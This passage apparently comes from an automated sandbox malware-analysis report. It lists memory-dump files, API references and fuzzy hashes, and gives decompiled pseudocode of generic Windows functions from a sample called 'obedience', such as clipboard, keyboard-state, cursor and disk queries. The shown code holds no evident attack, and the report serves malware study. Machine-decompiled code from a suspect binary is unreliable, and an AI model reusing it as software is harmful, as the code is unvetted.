      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Capture
      • String ID:
      • API String ID: 1145282425-3916222277
      • Opcode ID: ff4cf9bd31829bd0d7e94bc556d91badb813e77aece351ff243c68337a4b7d54
      • Instruction ID: 0606e6933e1171b687d706f98965ba764647296b505368e97cdab373aea4b401
      • Opcode Fuzzy Hash: ff4cf9bd31829bd0d7e94bc556d91badb813e77aece351ff243c68337a4b7d54
      • Instruction Fuzzy Hash: 6D316D316026408BFA20AE3E8CC571E27959B80358F54896FB656CB792DF3CDC49876D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00426E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E00426E50(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x426eec);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E00426DFC(_t22);
				} else {
					E00404CB0( &_v264, 0x100,  &_v260);
					E0040CBEC(_v264, 1);
					E004043D0();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(0x426ef3);
				return E00404A40( &_v264);
			}









      0x00426e5c
      0x00426e64
      0x00426e65
      0x00426e6a
      0x00426e6d
      0x00426e75
      0x00426e79
      0x00426ece
      0x00426e9f
      0x00426eb0
      0x00426ec2
      0x00426ec7
      0x00426ec7
      0x00426ed5
      0x00426ed8
      0x00426edb
      0x00426eeb

      APIs
      • GetLastError.KERNEL32(00000000,00426EEC), ref: 00426E70
      • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00426EEC), ref: 00426E96
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ErrorFormatLastMessage
      • String ID: TsA
      • API String ID: 3479602957-2436695117
      • Opcode ID: 78e8d5cd7bda894b9eff5c72b9da0435011197cf9eb709b32c37c1488d542068
      • Instruction ID: f90756e85f1b79bfa2e09082e3251b40f8ea81d22eea3e00e59946f0e7f338d7
      • Opcode Fuzzy Hash: 78e8d5cd7bda894b9eff5c72b9da0435011197cf9eb709b32c37c1488d542068
      • Instruction Fuzzy Hash: 3501FC747043185BE711EB21EC82BDB73ACDB48704F9200BAF704E61C1DAF86D44895D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00429A00 Relevance: 4.6, APIs: 3, Instructions: 51fileclipboardCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00429A00(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x48f858; // 0x423aa0
					E00426DC0(_t35);
				}
				E004291A0(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}












      0x00429a09
      0x00429a12
      0x00429a16
      0x00429a18
      0x00429a1d
      0x00429a1d
      0x00429a24
      0x00429a29
      0x00429a34
      0x00429a41
      0x00429a4c
      0x00429a55
      0x00429a58
      0x00429a5e
      0x00429a6e
      0x00429a80

      APIs
      • GetClipboardData.USER32 ref: 00429A0D
      • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00429A2F
      • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00429A41
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileMeta$ClipboardCopyDataHeader
      • String ID:
      • API String ID: 1752724394-0
      • Opcode ID: c81729b86197e74a7332bf758a832800c248b3b12199bdf5c57722e70b5557a1
      • Instruction ID: 53e59496765deb3c35bf6ac9cd254ca0d29d78f24490f3aa97cf14144001d615
      • Opcode Fuzzy Hash: c81729b86197e74a7332bf758a832800c248b3b12199bdf5c57722e70b5557a1
      • Instruction Fuzzy Hash: FE112A71B003048FD710DFAAC885A9AB7F8AF49310F50456EE919DB252DA75EC05CB95
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00462D8C Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00462D8C() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x490b8c = GetCurrentThreadId();
				L5:
				_t5 =  *0x490b90; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x490b7c != 0 &&  *((intOrPtr*)( *0x490b7c + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E004431A0( &_v12) == 0) {
							E00465388( *0x490b7c);
						}
					}
					goto L5;
				}
				return _t6;
			}






      0x00462d9d
      0x00462dcd
      0x00462dcf
      0x00462dd5
      0x00462ddf
      0x00462da7
      0x00462db5
      0x00462dc4
      0x00462dc8
      0x00462dc8
      0x00462dc4
      0x00000000
      0x00462da7
      0x00462de5

      APIs
      • GetCurrentThreadId.KERNEL32 ref: 00462D98
      • GetCursorPos.USER32(?,00000000,00000064), ref: 00462DB5
      • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00462DD5
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CurrentCursorObjectSingleThreadWait
      • String ID:
      • API String ID: 1359611202-0
      • Opcode ID: 5a20e436dc54f8ec2421a931c0b67769df7b3181374180b7d10e969b020d6658
      • Instruction ID: e8d035f7178e7bd3c27614eb6c90bdd891c1d00514965f85aea547a5586f270b
      • Opcode Fuzzy Hash: 5a20e436dc54f8ec2421a931c0b67769df7b3181374180b7d10e969b020d6658
      • Instruction Fuzzy Hash: 91F08971644604AFDB14E7A5DD86B5973DCAF10318F40057BE510962D1FBBDA840C72F
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00445BB4 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00445BB4(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E004444C8(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x48f840; // 0x490b7c
								E004651FC( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403DF8(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x490adc; // 0x2480e48
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x490adc; // 0x2480e48
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x490adc; // 0x2480e48
								_t25 = _t90 + 0x1c; // 0x0
								__eflags =  *_t79 -  *_t25;
								if( *_t79 !=  *_t25) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E0045B6D0( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00403DF8(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E0045B78C(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E0045B78C(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























      0x00445bc0
      0x00445bc2
      0x00445bc8
      0x00445c00
      0x00445c00
      0x00445c07
      0x00445c40
      0x00445c42
      0x00445c47
      0x00445d1f
      0x00445d1f
      0x00445d24
      0x00445d31
      0x00445d31
      0x00445d36
      0x00000000
      0x00445d3c
      0x00445c4d
      0x00445c52
      0x00000000
      0x00000000
      0x00445c58
      0x00445c5c
      0x00445c72
      0x00445c74
      0x00445c74
      0x00445c79
      0x00445c86
      0x00445c88
      0x00445c91
      0x00000000
      0x00445c91
      0x00445c7b
      0x00445c7b
      0x00445c7c
      0x00445c9b
      0x00445c9b
      0x00445c9f
      0x00445cb1
      0x00000000
      0x00445cb1
      0x00000000
      0x00445ca7
      0x00445c7e
      0x00445c7e
      0x00445c7f
      0x00445cb8
      0x00000000
      0x00445cb8
      0x00445c81
      0x00445c82
      0x00000000
      0x00000000
      0x00445cbf
      0x00445cc4
      0x00445cc8
      0x00000000
      0x00445cca
      0x00445cca
      0x00445ccf
      0x00445cd3
      0x00000000
      0x00000000
      0x00445cd7
      0x00445cdd
      0x00445cdd
      0x00445ce0
      0x00000000
      0x00000000
      0x00445ce9
      0x00445cf0
      0x00445cfe
      0x00445d05
      0x00445d0c
      0x00000000
      0x00445d18
      0x00000000
      0x00445cc8
      0x00445c5e
      0x00445c5e
      0x00445c63
      0x00445c6f
      0x00445c6f
      0x00445c6f
      0x00000000
      0x00445c6f
      0x00445c65
      0x00445c65
      0x00445c68
      0x00000000
      0x00000000
      0x00445c6a
      0x00445c6d
      0x00000000
      0x00000000
      0x00000000
      0x00445c6d
      0x00445c17
      0x00445c1e
      0x00000000
      0x00000000
      0x00445c2d
      0x00445c35
      0x00000000
      0x00445c3b
      0x00445bca
      0x00445bd1
      0x00445bd8
      0x00000000
      0x00445be6
      0x00445bf5
      0x00445bfa
      0x00000000
      0x00000000
      0x00445bfa
      0x00445bd8
      0x00445d45

      APIs
      • GetKeyboardState.USER32(?), ref: 00445CE9
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: KeyboardState
      • String ID:
      • API String ID: 1724228437-0
      • Opcode ID: 224b5fd876568c06f262c1a3a3e36d6ee2f5099db0f5db897807260a34a96535
      • Instruction ID: 691cd3f4dde7d2adad73dc57c083418edf7adbc77e6f16ced93021fa9077eaa1
      • Opcode Fuzzy Hash: 224b5fd876568c06f262c1a3a3e36d6ee2f5099db0f5db897807260a34a96535
      • Instruction Fuzzy Hash: FC419170A00A058FEF24DF28C5C87AA77A1AF05304F544567E405DB396CB7CDD45CB9A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004099C2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E004099C2(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _v32;
				CHAR* _t28;
				int _t35;
				intOrPtr _t40;
				intOrPtr _t43;
				intOrPtr* _t48;
				intOrPtr* _t49;
				intOrPtr _t53;
				intOrPtr _t55;

				_t28 = _a4;
				if(_t28 == 0) {
					_v32 = 0;
				} else {
					_v32 = _t28;
				}
				_t35 = GetDiskFreeSpaceA(_v32,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t53 = _v24;
				_t40 = E00405938(_v28, _t53, _v16, 0);
				_t48 = _a8;
				 *_t48 = _t40;
				 *((intOrPtr*)(_t48 + 4)) = _t53;
				_t55 = _v24;
				_t43 = E00405938(_v28, _t55, _v20, 0);
				_t49 = _a12;
				 *_t49 = _t43;
				 *((intOrPtr*)(_t49 + 4)) = _t55;
				return _t35;
			}


















      0x004099cb
      0x004099d0
      0x004099d9
      0x004099d2
      0x004099d2
      0x004099d2
      0x004099f0
      0x004099ff
      0x00409a02
      0x00409a0f
      0x00409a12
      0x00409a17
      0x00409a1a
      0x00409a1c
      0x00409a29
      0x00409a2c
      0x00409a31
      0x00409a34
      0x00409a36
      0x00409a3f

      APIs
      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 004099F0
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: DiskFreeSpace
      • String ID:
      • API String ID: 1705453755-0
      • Opcode ID: 4e7f8d245c1b97ba576d3fe2500d88b825555d402c931bb33f8c78baad490c50
      • Instruction ID: 132b7cc182f929aa54bb7edcc5be5463a0d05b3da3c9eddfc1a5f8d23fd47a6a
      • Opcode Fuzzy Hash: 4e7f8d245c1b97ba576d3fe2500d88b825555d402c931bb33f8c78baad490c50
      • Instruction Fuzzy Hash: ED11FAB1E01109EFDB00CF99C881DAFF7F9EF8C314B54816AA519E7351E631AE018BA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0043AFAC Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
      Download Yara Rule
      C-Code - Quality: 53%
      			E0043AFAC(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L00407550();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x43afe6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E00403DF8(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}








      0x0043afb5
      0x0043afb8
      0x0043afba
      0x0043afc0
      0x0043b004
      0x0043b008
      0x0043b009
      0x0043b00d
      0x0043b010
      0x0043b011
      0x0043b016
      0x00000000
      0x0043b016
      0x0043afc5
      0x0043afca
      0x0043afcd
      0x0043afd7
      0x0043afde
      0x0043afe1
      0x00000000

      APIs
      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0043B011
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: NtdllProc_Window
      • String ID:
      • API String ID: 4255912815-0
      • Opcode ID: 7a9d797a9accea8463c0fd097cc91c4a05ed5930e7a8c91d19bf562b64613883
      • Instruction ID: 306dd0e5afd1966333345a06e70bbe74e0a6bf36249a3bde4be2ae70f37fec03
      • Opcode Fuzzy Hash: 7a9d797a9accea8463c0fd097cc91c4a05ed5930e7a8c91d19bf562b64613883
      • Instruction Fuzzy Hash: 53F0C276608204AFD704DE9ED881C96BBECEB0D32475140B6F908D7640D235AD009B64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004273EC Relevance: 1.5, APIs: 1, Instructions: 37COMMON
      Download Yara Rule
      C-Code - Quality: 94%
      			E004273EC(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}











      0x004273f2
      0x004273f5
      0x004273f8
      0x004273fc
      0x00427401
      0x00427407
      0x00427408
      0x00427412
      0x00427425
      0x0042742e
      0x00427436
      0x00427439
      0x00427439
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00427414
      0x00427414
      0x00427417
      0x00427419
      0x0042741c
      0x0042741f
      0x0042741f
      0x00000000
      0x00427414
      0x00427440

      APIs
      • GetSystemInfo.KERNEL32(?), ref: 004273FC
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: InfoSystem
      • String ID:
      • API String ID: 31276548-0
      • Opcode ID: c37d24fa094edddc0bbc2a3042128570d5d8995d4bf8c6c6d2ae6a62543045b3
      • Instruction ID: 4eb94634b245c3398a57fc3eb680f7293f91554cf07e2667103df5b9ea9e6c6f
      • Opcode Fuzzy Hash: c37d24fa094edddc0bbc2a3042128570d5d8995d4bf8c6c6d2ae6a62543045b3
      • Instruction Fuzzy Hash: B2F0C271E081189BCB10EF98D48889CFBB4FA563017D082AAD408E7342EB38A954CB95
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044FBC8 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 83%
      			E0044FBC8() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x48f9e0; // 0x490740
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x44fd2e);
